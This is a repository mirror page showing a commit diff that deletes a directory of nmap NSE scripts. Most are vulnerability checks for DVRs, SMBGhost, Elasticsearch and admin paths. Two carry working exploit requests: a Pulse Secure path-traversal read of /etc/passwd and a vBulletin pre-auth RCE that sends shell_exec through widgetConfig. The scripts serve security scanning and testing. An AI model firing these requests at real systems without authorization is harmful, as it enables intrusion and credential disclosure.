github
/
PenetrationTestingScripts
mirror of https://github.com/ym2011/PenetrationTestingScripts
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Delete nmap_scripts directory

pull/8/head
InfoSec 2021-01-27 17:45:43 +08:00 committed by GitHub
parent 6fca5d3401
commit 5289648a6b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
27 changed files with 0 additions and 4081 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
nmap_scripts/LG_Infoleak_v1.nse
View File

@ -1,29 +0,0 @@
local http require "http"
local string require "string"
local stdnse require "stdnse"
local shortport require "shortport"
description = [[
. LG DVR LE6016D
未认证远程获取用户/密码
]]
portrule = shortport.http
action = function(host, port)
local uri = "/dvr/wwwroot/user.cgi"
local output = stdnse.output_table()
local response = http.get(host, port, uri)
if response.status == 200 then
if string.find(response.body, "<name>") ~= nil and string.find(response.body, "<pw>") ~= nil then
output = "[+] Found vulnerable."
else
output = "[-] Not Found vulnerable."
end
end
return output
end

34
nmap_scripts/LG_LFI.nse
View File

@ -1,34 +0,0 @@
local http require "http"
local string require "string"
local stdnse require "stdnse"
local shortport require "shorport"
description = [[
Desc:LG DVR LE6016D存在敏感信息泄露漏洞
未认证用户只需要发起一个请求链接即可访问系统敏感文件,
如/etc/passwd, /etc/shadow
Tested:LG DVR LE6016D
]]
author = "seaung"
portrule = shortport.http
action = function(host, port)
local output = stdnse.output_table()
local url = "/etc/passwd"
local response = http.get(host, port, url)
if response.status == 200 then
if string.find(response.body, "root") ~= nil then
output = "[+] Found vulnerable."
else
output = "[-] Not Found vulnerable."
end
end
return output
end

34
nmap_scripts/Novo-credentials_disclosure.nse
View File

@ -1,34 +0,0 @@
local http require "http"
local string require "string"
local stdnse require "stdnse"
local shortport require "shortport"
description = [[
Desc:Novo DVR存在凭证泄露问题
攻击者精心构造链接,
修改cookie信息即可查看返回的登录凭证信息。
]]
author = "seaung"
portrule = shortport.http
action = function(host, port)
local url = "/device.rsp?opt=user&cmd=list"
local output = stdnse.output_table()
local options = {headers={}}
options["headers"]["cookie"] = "uid=admin"
local response = http.get(host, port, url, options)
if response.status == 200 then
if string.find(response.body, "admin") ~= nil and string.find(response.body, "pwd") ~= nil then
stdnse.debug1("[+] found vulnerable.")
output = "[+] Found vulnerable."
else
stdnse.debug1("[-] not found vulnerable.")
output = "[-] Not Found vulnerable."
end
end
return output
end

115
nmap_scripts/cve-2020-0796.nse
View File

@ -1,115 +0,0 @@
local smb = require "smb"
local stdnse = require "stdnse"
local nmap = require "nmap"
description = [[
smb-protocols script modified to apply check for CVE-2020-0796 by psc4re.
Attempts to list the supported protocols and dialects of a SMB server.
NSE script to detect vulnerable CVE-2020-0796 issue, with Microsoft SMBv3 Compression (aka coronablue, SMBGhost)
The script is a modified version of smb-protocols.nse script
with a modified output data for v3.11 detection and validating CVE-2020-0796.
Note: This script just safe checks for CVE-2020-0796 vulnerability on SMBv3 and doesn't attempt anything beyond that.
Packet check based on https://github.com/ollypwn/SMBGhost/
The script attempts to initiate a connection using the dialects:
* NT LM 0.12 (SMBv1)
* 2.02 (SMBv2)
* 2.10 (SMBv2)
* 3.00 (SMBv3)
* 3.02 (SMBv3)
* 3.11 (SMBv3)
Additionally if SMBv1 is found enabled, it will mark it as insecure. This
script is the successor to the (removed) smbv2-enabled script.
#git clonehttps://github.com/pr4jwal/CVE-2020-0796
#cp cve-2020-0796.nse /usr/share/nmap/scripts/``
#nmap --script-updatedb
#nmap -p445 --script cve-2020-0796 <<target>>``
Checks for compression based on https://github.com/ollypwn/SMBGhost/
Could've been done utilizing smb.lua in the nselib
but it required substantial editing of the functions, went with sockets.
]]
---
-- @usage nmap -p445 --script smb-protocols <target>
-- @usage nmap -p139 --script smb-protocols <target>
--
-- @output
-- | smb-protocols:
-- | dialects:
-- | NT LM 0.12 (SMBv1) [dangerous, but default]
-- | 2.02
-- | 2.10
-- | 3.00
-- | 3.02
-- |_ 3.11 (SMBv3.11) compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost
--
-- @xmloutput
-- <table key="dialects">
-- <elem>NT LM 0.12 (SMBv1) [dangerous, but default]</elem>
-- <elem>2.02</elem>
-- <elem>2.10</elem>
-- <elem>3.00</elem>
-- <elem>3.02</elem>
-- <elem>3.11 (SMBv3.11) [Potentially Vulnerable to CVE-2020-0796 Coronablue]</elem>
-- </table>
---
author = "Paulino Calderon (Modified by Psc4re)"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"safe", "discovery"}
hostrule = function(host)
return smb.get_port(host) ~= nil
end
action = function(host,port)
local status, supported_dialects, overrides
local output = stdnse.output_table()
overrides = {}
status, supported_dialects = smb.list_dialects(host, overrides)
if status then
for i, v in pairs(supported_dialects) do -- Mark SMBv1 as insecure
if v == "NT LM 0.12" then
supported_dialects[i] = v .. " (SMBv1) [dangerous, but default]"
end
if v == "3.11" then
local msg
local response
local compresionalg
local comp
msg = '\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
local socket = nmap.new_socket()
socket:set_timeout(3000)
socket:connect(host.ip,445)
socket:send(msg)
response,data = socket:receive()
compressionalg= string.sub(data,-2)
if compressionalg == "\x01\x00" then
comp = "LZNT1 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
elseif compressionalg == "\x02\x00" then
comp ="LZ77 compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
elseif compressionalg == "\x00\x00" then
comp ="No Compression Not Vulnerable"
elseif compressionalg == "\x03\x00" then
comp="LZ77+Huffman compression algorithm - Vulnerable to CVE-2020-0796 SMBGhost"
end
supported_dialects[i] = v .." " .. comp
end
end
output.dialects = supported_dialects
end
if #output.dialects>0 then
return output
else
stdnse.debug1("No dialects were accepted")
if nmap.verbosity()>1 then
return "No dialects accepted. Something may be blocking the responses"
end
end
end

34
nmap_scripts/cve.nse
View File

@ -1,34 +0,0 @@
description = [[
CVE api to fetch vuln in detected service
INSTALLATION
$ git clone https://github.com/arpitrohela/nmap_nse.git
$ cd nmap_nse/
$ sudo cp cve.nse /usr/share/nmap/scripts/
$ sudo nmap --script cve.nse 192.168.0.1 -p 80 -sV
]]
author = "Arpit Rohela"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln"}
local http = require "http"
-- The Rule Section --
portrule = function(host, port)
return port.state == "open"
end
-- The Action Section --
action = function(host, port)
local uri = "/api/search/httpd"
local response = http.get("cve.circl.lu", port, uri)
if ( response.status == 200 ) then
return response.body
-- and port.version.product--
-- and type(port.version.version)--
end
end

67
nmap_scripts/elasticsearch.nse
View File

@ -1,67 +0,0 @@
description = [[
Attempts to enumerate indices, plugins and cluster nodes on a target elasticsearch
exposing an unauthenticated HTTP port (default 9200/tcp) using the elasticsearch RESTful API.
Installation
$ git clone https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git
$ cp nmap-elasticsearch-nse/elasticsearch.nse /usr/share/nmap/scripts/
$ nmap --script=elasticsearch <target>
]]
author = "theMiddle"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "version"}
local http = require "http"
local string = require "string"
local json = require "json"
portrule = function(host, port)
return port.protocol == "tcp" and port.state == "open"
end
action = function(host, port)
local uri = "/"
local response = http.get(host, port, uri)
if ( response.status == 200 ) then
if ( string.find(response.body, "You Know, for Search") ) then
local out = "by theMiddle (Twitter: @Menin_TheMiddle)\r\n\r\n"
out = out .. "found RESTful API\r\n"
err, esjson = json.parse(response.body)
out = out .. "version: ".. esjson['version']['number'] .."\r\n"
if esjson['cluster_name'] then
out = out .. "cluster name: " .. esjson['cluster_name'] .. "\r\n"
end
out = out .. "\r\nIndices found in /_cat/indices:\r\n"
local resindices = http.get_url("http://"..host.ip..":"..port.number.."/_cat/indices?pri&v&h=health,index,docs.count")
out = out .. resindices.body
out = out .. "\r\nPlugins found in /_cat/plugins:\r\n"
local resplugins = http.get_url("http://"..host.ip..":"..port.number.."/_cat/plugins")
out = out .. resplugins.body
out = out .. "\r\nNodes found in /_cat/nodes:\r\n"
local resnodes = http.get_url("http://"..host.ip..":"..port.number.."/_cat/nodes")
out = out .. resnodes.body
out = out .. "\r\nNodes process:\r\n"
local resprocess = http.get_url("http://"..host.ip..":"..port.number.."/_nodes/_all/process")
err, psjson = json.parse(resprocess.body)
for key,value in pairs(psjson['nodes']) do
out = out .. " - Name: " .. value['name'] .. "\r\n"
out = out .. " - Transport Address: " .. value['transport_address'] .. "\r\n"
out = out .. " - Host: " .. value['host'] .. "\r\n"
out = out .. " - IP: " .. value['ip'] .. "\r\n"
out = out .. " - Version: " .. value['version'] .. "\r\n\r\n"
end
return out
end
end
end

379
nmap_scripts/freevulnsearch.nse
View File

@ -1,379 +0,0 @@
-- Head
-- Required NSE libraries
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local http = require "http"
local json = require "json"
-- Input Arguments
local apipath = stdnse.get_script_args("freevulnsearch.apipath")
local notls = stdnse.get_script_args("freevulnsearch.notls")
local summary = stdnse.get_script_args("freevulnsearch.summary")
local xmlhtml = stdnse.get_script_args("freevulnsearch.xmlhtml")
description = [[
project https://github.com/OCSAF/freevulnsearch
This script [Version 1.1.8] allows you to automatically search for CVEs using the API of
https://www.circl.lu/services/cve-search/ in connection with the found CPEs
using the parameter -sV in NMAP.
This script is part of the FreeOCSAF Project - https://freecybersecurity.org.
Use only with legal authorization and at your own risk! ANY LIABILITY WILL BE REJECTED!
Thanks to cve-search.org and circl.lu for the ingenious api
and special thanks to the community for many useful ideas that speed up my coding!
Realized functions:
Version 1.0 - Contains the basic functions to quickly find relevant CVEs.
Version 1.0.1 - Includes EDB and MSF in output and minor changes.
Version 1.0.2 - Special CPE formatting and output optimization.
Version 1.0.3 - Small adjustments
Version 1.1 - Support your own cve-search api-link - https://<IP>/api/cvefor/
Version 1.1.1 - Adaptation to CVSS rating instead of OSSTMM - Input from the community, thanks
Version 1.1.2 - Special CPE formatting - Many thanks to Tore (cr33y) for testing.
Version 1.1.3b - Special CPE formatting - Many thanks to Tore (cr33y) for testing.
Version 1.1.4 - Optimization for OCSAF freevulnaudit.sh project.
Version 1.1.5 - Assignment to external category only
Version 1.1.6 - Adaptation API to http and tls as option
Version 1.1.6a - Adaptation API to tls and http as option
Version 1.1.7 - Optimized for nmap 7.80
Version 1.1.8 - Optimized for cve-search api
Future functions:
Version 1.2 - Shall contains optional sort by severity (CVSS)
Version 1.3 - Implementation of your useful ideas.
Usage:
nmap -sV --script freevulnsearch <target>
Output explanation:
CVE-Number Rating CVSS EDB MSF CVE-Link
CVE-Number:
Common Vulnerabilities and Exposures
CVSS v3.0 Ratings:
Critical (CVSS 9.0 - 10.0)
High (CVSS 7.0 - 8.9)
Medium (CVSS 4.0 - 6.9)
Low (CVSS 0.1 - 3.9)
None (CVSS 0.0)
CVSS:
Common Vulnerability Scoring System with with the level of severty from 0.0 - 10.0
EDB:
There is an exploit in the Exploit-DB.com
MSF:
There is a module in the Metasploit Framework
CVE-Link:
Additional information on the vulnerability found.
]]
author = "Mathias Gut"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"safe", "vuln", "external"}
-- @usage
-- nmap -sV --script freevulnsearch [--script-args apipath=<url>] <target>
-- nmap -sV --script freevulnsearch [--script-args notls=yes] <target>
-- nmap -sV --script freevulnsearch [--script-args summary=yes] <target>
-- nmap -sV --script freevulnsearch [--script-args xmlhmtl=yes] <target>
--
-- @output
--
-- 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
-- | freevulnsearch:
-- | CVE-2018-15473 Medium 5.0 EDB MSF https://cve.circl.lu/cve/CVE-2018-15473
-- | CVE-2017-15906 Medium 5.0 https://cve.circl.lu/cve/CVE-2017-15906
-- | CVE-2016-10708 Medium 5.0 https://cve.circl.lu/cve/CVE-2016-10708
-- | CVE-2010-4755 Medium 4.0 https://cve.circl.lu/cve/CVE-2010-4755
-- | CVE-2010-4478 High 7.5 https://cve.circl.lu/cve/CVE-2010-4478
-- | CVE-2008-5161 Low 2.6 https://cve.circl.lu/cve/CVE-2008-5161
-- |_ *CVE found with NMAP-CPE: (cpe:/a:openbsd:openssh:4.7p1)
--
-- Portrule
-- The table port.version contains the CPEs
portrule = function(host, port)
local portv=port.version
return portv ~= nil and portv.version ~= nil
end
-- Function to check if a version number exists at the CPE
function func_check_cpe(cpe)
_, count = string.gsub(cpe, ":", " ")
if count >= 4 then
return cpe
else
return 0
end
end
-- Function to check for special CPE formatting.
function func_check_cpe_form(cpe)
local cpe_form
local sub_form1
local sub_form2
local sub_form3
local cpe_front
local cpe_version
_, count1 = string.gsub(cpe, ":httpfileserver:", " ")
_, count2 = string.gsub(cpe, ".*:.*:.*:.*:.*-", " ")
_, count3 = string.gsub(cpe, ".*:.*:.*:.*:.*_", " ")
_, count4 = string.gsub(cpe, ".*:.*:.*:.*:.*%..*%.%d%a%d", " ")
_, count5 = string.gsub(cpe, ".*:.*:.*:.*:.*%a%d", " ")
_, count6 = string.gsub(cpe, ".*:.*:.*:.*:.*%d%a", " ")
if count1 ~= 0 then
cpe_form = string.gsub(cpe,"httpfileserver","http_file_server")
return cpe_form
elseif count2 ~= 0 then -- (MySQL) 5.0.51a-3ubuntu5 -to- 5.0.51a
sub_form1 = string.gsub(cpe,".*:",":")
cpe_version = string.gsub(sub_form1,"-.*","")
cpe_front = string.gsub(cpe,cpe_version .. ".*","")
cpe_form = cpe_front .. cpe_version
return cpe_form
elseif count3 ~= 0 then -- (Exim smtpd) 4.90_1 -to- 4.90
sub_form1 = string.gsub(cpe,".*:",":")
cpe_version = string.gsub(sub_form1,"_.*","")
cpe_front = string.gsub(cpe,cpe_version .. ".*","")
cpe_form = cpe_front .. cpe_version
return cpe_form
elseif count4 ~= 0 then -- (OpenSSH) 6.6.1p1 -to- 6.6:p1
sub_form1 = string.gsub(cpe,".*:",":")
sub_form2 = string.gsub(sub_form1,"%.%d%a%d.*","")
sub_form3 = string.gsub(sub_form1,".*%.%d","")
cpe_version = sub_form2 .. ":" .. sub_form3
cpe_front = string.gsub(cpe,sub_form1,"")
cpe_form = cpe_front .. cpe_version
return cpe_form
elseif count5 ~= 0 then -- (OpenSSH) 7.5p1 -to- 7.5:p1
sub_form1 = string.gsub(cpe,".*:",":")
sub_form2 = string.gsub(sub_form1,"%a.*","")
sub_form3 = string.gsub(sub_form1,sub_form2,"")
cpe_version = sub_form2 .. ":" .. sub_form3
cpe_front = string.gsub(cpe,sub_form1,"")
cpe_form = cpe_front .. cpe_version
return cpe_form
elseif count6 ~= 0 then -- (ProFTPD) 1.3.5a -to- 1.3.5
sub_form1 = string.gsub(cpe,".*:",":")
sub_form2 = string.gsub(sub_form1,"%d.*","")
cpe_version = string.gsub(sub_form1,sub_form2,"")
cpe_front = string.gsub(cpe,sub_form1,"")
cpe_form = cpe_front .. cpe_version
return cpe_form
else
return 0
end
end
-- Function to check for known vulnerabilities without CVE
function func_check_known_vuln(cpe)
local cpe_vuln
if cpe == "cpe:/a:vsftpd:vsftpd:2.3.4" then
cpe_vuln = "EDB-ID-17491\t" .. "Critical\t" .. "None\t" .. "EDB MSF\t" .. "https://www.exploit-db.com/exploits/17491"
return cpe_vuln
else
return 0
end
end
-- Function to query CVEs via CPEs with API (circl.lu).
function func_check_cve(cpe)
local url
local option = {
max_body_size=40000000,
timeout=40000
}
local response
local request
local status
local vulnerabilities
if not apipath then
if not notls then
url = "https://cve.circl.lu/api/cvefor/"
else
url = "http://cve.circl.lu/api/cvefor/"
end
else
url = apipath
end
request = url .. cpe
response = http.get_url(request, option)
status, vulnerabilities = json.parse(response.body)
if status ~= true then
return 1
elseif type(next(vulnerabilities)) == "nil" then
return 2
elseif (status == true and vulnerabilities ~= "") then
return func_output(vulnerabilities)
else
return 2
end
end
-- Function to generate the script output.
function func_output(vulnerabilities)
local output_table = {}
local input_table = {}
local cve_url= "https://cve.circl.lu/cve/"
local cve_value
local cvss
local cvss_value
local cvss_rating
local url_value
local edb
local msf
local exploit
local sum
local cwe
local xmlhtml_out
local i
local t
if not xmlhtml then
xmlhtml_out = ""
else
xmlhtml_out = " "
end
for i,t in ipairs(vulnerabilities) do
cve_value = t.id
cvss = tonumber(t.cvss)
url_value = cve_url .. t.id
if t.refmap then
edb = t.refmap["exploit-db"]
msf = t.refmap.metasploit
end
if not cvss then
cvss_value = "None"
cvss_rating = "None"
else
cvss_value = cvss
cvss_rating = func_rating(cvss)
end
if not edb and not msf then
exploit = ""
elseif edb and not msf then
exploit = "EDB"
elseif not edb and msf then
exploit = "MSF"
elseif edb and msf then
exploit = "EDB MSF"
end
if not summary then
output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value
else
sum = t.summary
if not t.cwe then
output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value ..
"\n *SUMMARY: " .. sum .. "\n"
else
cwe = t.cwe
output_table = cve_value .. xmlhtml_out .. "\t" .. cvss_rating .. "\t" .. cvss_value .. "\t" .. exploit .. "\t" .. url_value ..
"\n *CWE: " .. cwe ..
"\n *SUMMARY: " .. sum .. "\n"
end
end
input_table[i] = output_table
end
return input_table
end
-- Function to assign CVSS values to CVSS V3.0 ratings
function func_rating(cvss)
if (cvss == 0.0) then
return "None\t"
elseif (3.9 >= cvss and cvss >= 0.1) then
return "Low\t"
elseif (6.9 >= cvss and cvss >= 4.0) then
return "Medium\t"
elseif (8.9 >= cvss and cvss >= 7.0) then
return "High\t"
elseif (10.0 >= cvss and cvss >= 9.0) then
return "Critical"
end
end
-- Action
-- Main-Function
action = function(host, port)
local cpe=""
local check
local sort_values
local form_cpe
local known_vuln
local i
for i, cpe in ipairs(port.version.cpe) do
check = func_check_cpe(cpe)
if check ~= 0 then
sort_values = func_check_cve(check)
if sort_values == 1 then
return "*Error with API query. API or network possibly not available."
elseif sort_values == 2 then
form_cpe = func_check_cpe_form(check)
if form_cpe == 0 then
known_vuln = func_check_known_vuln(check)
if known_vuln == 0 then
return "\n *No CVE found with NMAP-CPE: (" .. check .. ")" ..
"\n *Check other sources like https://www.exploit-db.com"
else
return "\n " .. known_vuln .. "\n *No CVE found with CPE: (" .. check .. ")"
end
else
sort_values = func_check_cve(form_cpe)
if sort_values == 2 then
return "\n *No CVE found with NMAP-CPE: (" .. check .. ")" ..
"\n *No CVE found with freevulnsearch function: (" .. form_cpe .. ")" ..
"\n *Check other sources like https://www.exploit-db.com"
else
table.sort(sort_values, function(a, b) return a>b end)
table.insert(sort_values, "*No CVE found with NMAP-CPE: (" ..check .. ")")
table.insert(sort_values, "*CVE found with freevulnsearch function: (" .. form_cpe .. ")")
return sort_values
end
end
else
table.sort(sort_values, function(a, b) return a>b end)
table.insert(sort_values, "*CVE found with NMAP-CPE: (" ..check .. ")")
return sort_values
end
elseif check == 0 then
return "\n *Check unspecific version manually: (".. cpe .. ")"
end
end
end

57
nmap_scripts/http-middleware-path-finder.nse
View File

@ -1,57 +0,0 @@
local http = require "http"
local shortport = require "shortport"
local string = require "string"
local stdnse = require "stdnse"
description = [[
A middleware sensitive directory scan script
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
$ cd /nse_vuln/
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -n -p 443 --script http-middleware-path-finder.nse victim_host
]]
author = "Rvn0xsy@gmail.com"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"default"}
blog = "https://payloads.online"
-- Precision mode
-- portrule = shortport.port_or_service( {80, 443, 8080, 7001}, {"http", "https"}, "tcp", "open")
portrule = shortport.service({"http","https"},"tcp","open")
action = function(host, port)
out = stdnse.output_table()
local status, result , body = http.identify_404(host,port)
local all = nil
request_paths = {
"/phpinfo.php",
"/manager/html",
"/_async/AsyncResponseService",
"/console/login/LoginForm.jsp",
"/phpmyadmin/",
"/web-console",
"/jmx-console",
"/host-manager",
"/status",
"/logs/access_log",
"/jonasAdmin/",
"/ibm/console/logon.jsp"
}
for key,value in ipairs(request_paths)
do
all = http.pipeline_add(value,nil,all,'GET')
end
local results = http.pipeline_go(host, port, all)
for num,res in ipairs(results)do
if(res.status ~= result)then
out[num] = request_paths[num]
end
end
return out
end

82
nmap_scripts/http-pulse_ssl_vpn.nse
View File

@ -1,82 +0,0 @@
description = [[
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4)
INSTALLATION
$ git clone https://github.com/r00tpgp/http-pulse_ssl_vpn.nse.git
$ cd http-pulse_ssl_vpn.nse/
$ sudo cp http-pulse_ssl_vpn.nse /usr/share/nmap/scripts/
$ sudo nmap -n -p 443 --script http-pulse_ssl_vpn -n victim_host
]]
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
---
-- @usage
-- nmap -p <port> --script pulse_ssl_vpn <target>
--
-- @output
-- PORT STATE SERVICE
-- s4430/tcp open http
-- | http-vuln-cve2019-11510:
-- | VULNERABLE
-- | Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2019-11510
-- |
-- | Disclosure date: 2019-04-24
-- | References:
-- | http://www.securityfocus.com/bid/108073
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510
-- |_ http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html
--
-- @args http-vuln-cve2019-11510.method The HTTP method for the request. The default method is "GET".
-- @args http-vuln-cve2019-11510.path The URL path to request. The default path is "/".
author = "r00tpgp"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln" }
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests",
state = vulns.STATE.NOT_VULN,
description = [[
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
]],
IDS = {
CVE = "CVE-2019-11510"
},
references = {
'http://www.securityfocus.com/bid/108073',
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510',
'http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html'
},
dates = {
disclosure = { year = '2019', month = '04', day = '24' }
}
}
-- Send a simple GET request to the server, if it returns appropiate string, then you have a vuln host
options = {header={}} options['header']['User-Agent'] = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
--local req = http.get(host, port, uri, options)
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local url = stdnse.get_script_args(SCRIPT_NAME..".url") or "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
local response = http.generic_request(host, port, "GET", "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/", options)
if response.status == 200 and string.match(response.body, "root:x:0:0:root:/:/bin/bash") then
-- if response.status == 200 then
vuln.state = vulns.STATE.VULN
end
return vuln_report:make_output(vuln)
end

88
nmap_scripts/http-vuln-CVE-2019-16759.nse
View File

@ -1,88 +0,0 @@
description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
INSTALLATION
$ git clone https://github.com/r00tpgp/http-vuln-CVE-2019-16759
$ cd http-vuln-CVE-2019-16759/
$ sudo cp http-vuln-CVE-2019-16759.nse /usr/share/nmap/scripts/
$ sudo nmap --script http-vuln-CVE-2019-16759 -p 80 -sSV <target_ip_addr>
]]
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
---
-- @usage
-- nmap -p <port> --script http-vuln-CVE-2019-16759 <target>
--
-- @output
-- PORT STATE SERVICE
-- s4430/tcp open http
-- | http-vuln-CVE-2019-16759:
-- | VULNERABLE
-- | vBulletin 5.x 0day pre-auth RCE exploit
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2019-16759
-- |
-- | Disclosure date: 2019-09-23
-- | References:
-- | https://seclists.org/fulldisclosure/2019/Sep/31
-- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759
--
-- @args http-vuln-cve2019-16759.path The default URL path to request. The default is "/".
author = "r00tpgp"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln" }
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "vBulletin 5.x 0day pre-auth RCE exploit",
state = vulns.STATE.NOT_VULN,
description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
]],
IDS = {
CVE = "CVE-2019-16759"
},
references = {
'https://seclists.org/fulldisclosure/2019/Sep/31',
'https://nvd.nist.gov/vuln/detail/CVE-2019-16759',
},
dates = {
disclosure = { year = '2019', month = '09', day = '23' }
}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "POST"
local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/index.php?routestring=ajax/render/widget_php"
local body = {
["widgetConfig[code]"] = "echo shell_exec(\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\');exit;",
}
local options = {
header = {
Connection = "close",
["Content-Type"] = "application/x-www-form-urlencoded",
["User-Agent"] = "curl/7.65.3",
["Accept"] = "*/*",
},
content = body
}
local response = http.post(host, port, path, nil, nil, body)
if response and string.match(response.body, "h4x0000r") then
vuln.state = vulns.STATE.VULN
end
return vuln_report:make_output(vuln)
end

180
nmap_scripts/http-vuln-cve2016-0870.nse
View File

@ -1,180 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
local table = require "table"
description = [[
Trane Tracer SC is an intelligent field panel for communicating with HVAC equipment controllers. According to Trane U.S. Inc., Tracer SC is deployed across several sectors including Commercial Facilities and others.
Contents of specific directories on the Tracer SC are exposed with the web server application to unauthenticated users. These directories have sensitive information within the configuration files.
Valid on Trane Tracer SC version 4.20.1134 and below. Tested on 7/3/17.
$ git clone https://github.com/hkm/nmap-nse-scripts.git
References:
* https://ics-cert.us-cert.gov/advisories/ICSA-16-259-03
* http://www.cvedetails.com/cve/CVE-2016-0870/
* http://websec.mx
]]
---
-- @usage nmap -p80 --script http-vuln-cve2016-0870.nse <target>
--
-- @output
-- | trane-info:
-- | serverName: TracerSC
-- | serverTime: 2017-07-03T21:01:02-04:00
-- | serverBootTime: 2017-06-25T03:14:38-04:00
-- | vendorName: Trane
-- | productName: Tracer SC
-- | productVersion: v4.40.1211 (release)
-- | kernelVersion: 2.6.30_HwVer12AB-hydra
-- | hardwareType: HwVer12AB
-- | hardwareSerialNumber: E15A#####
-- | 1:equipmentUri: /equipment/generic/generic/##
-- | 1:displayName: BOILER ROOMS
-- | 1:deviceName: BOILER ROOMS
-- | 1:equipmentFamily: Generic
-- | 1:roleDocument: BOILER_ROOMS
-- | 1:isOffline: false
-- | 2:equipmentUri: /equipment/generic/generic/##
-- | 2:displayName: BOILER ROOMS
-- | 2:deviceName: BOILER ROOMS
-- | 2:equipmentFamily: Generic
-- | 2:roleDocument: BOILER_ROOMS
-- | 2:isOffline: false
-- | 3:equipmentUri: /equipment/generic/generic/##
-- | 3:displayName: EXHAUSTS 3 RM-6
-- | 3:deviceName: EXHAUSTS 3 RM-6
-- | 3:equipmentFamily: Generic
-- | 3:roleDocument: EXHAUSTS_3_RM-6
-- | 3:isOffline: false
--
-- @xmloutput
-- <elem key="serverName">TracerSC </elem>
-- <elem key="serverTime">2017-07-03T21:01:02-04:00 </elem>
-- <elem key="serverBootTime">2017-06-25T03:14:38-04:00 </elem>
-- <elem key="vendorName">Trane </elem>
-- <elem key="productName">Tracer SC </elem>
-- <elem key="productVersion">v4.40.1211 (release) </elem>
-- -- <elem key="kernelVersion">2.6.30_HwVer12AB-hydra </elem>
-- <elem key="hardwareType">HwVer12AB </elem>
-- <elem key="hardwareSerialNumber">E15A##### </elem>
-- <elem key="1:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="1:displayName">BOILER ROOMS </elem>
-- <elem key="1:deviceName">BOILER ROOMS </elem>
